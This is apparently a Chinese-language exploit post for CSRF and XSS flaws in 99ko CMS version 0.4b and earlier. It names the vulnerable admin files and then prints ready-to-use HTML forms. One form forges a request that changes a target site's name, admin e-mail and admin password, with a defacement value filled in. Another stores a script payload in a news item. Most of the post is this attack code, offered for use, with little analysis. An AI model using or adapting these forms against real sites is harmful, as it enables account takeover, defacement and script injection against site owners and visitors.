By:追心

漏洞说明:

    99ko <= 0.4b存在多个CSRF/XSRF漏洞,99ko多个CSRF/XSRF漏洞。,该漏洞导致任意远程修改网站相关信息……

漏洞类型:

    CSRF、XSRF、XSS、跨站请求伪造

漏洞测试:

漏洞存在于后台目录文件:

../admin/config.php
../admin/news_edit.php
../admin/page_edit.php

修改网站配置信息EXP:

<h2>修改网站配置信息EXP</h2>
<form method="post" action="http://www.xxx.net/?admin/config,save"><p>
<label>Site Name : </label><br />
<input type="text" name="nom_site" value="HaCked By KedAns-Dz" /><br /></div>
</select><br /></div>
<div class="elem"><label>Site Description :</label><br />
<textarea style="width:100%;height:50px;" name="desc_site"></textarea><br /></div>
<div class="elem_enligne"><label>News Number :</label><br />
<input type="text" name="mod_news_nb_last" value="" /><br /></div>
<div class="elem_enligne"><label>Admin E-mail :</label><br />
<input type="text" name="email_admin" value="zhuixin8@qq.com /><br /></div>
<div class="elem"><label>New Admin Password :</label><br />
<input autocomplete="off" type="text" name="mdp_admin" value="" /> <i>( 6 minimum )</i><br /></div>
<input type="submit" value="Enregistrer" /></p>
</form>

XSS跨站攻击EXP:

<h2>XSS跨站攻击EXP</h2>
<form method="post" action="http://www.xxx.net/?admin/news,save">
<input type="hidden" name="id" value="" /><p>
<div class="elem_enligne"><label>Titre</label><br />
<input type="text" name="nom" value="<script>alert('1337->XSS<-KedAns');</script>" /><br /></div>
<div class="elem"><label>Contenu</label><br />
<textarea id="wysiwyg" name="contenu">XSS Code</textarea><br /></div>
<input type="submit" value="Enregistrer" /></p>
</form>

或者直接访问:http://www.xxx.net/?admin/news,在标题或者内容填写以下代码测试:

<script>alert('1337->XSS<-KedAns');</script>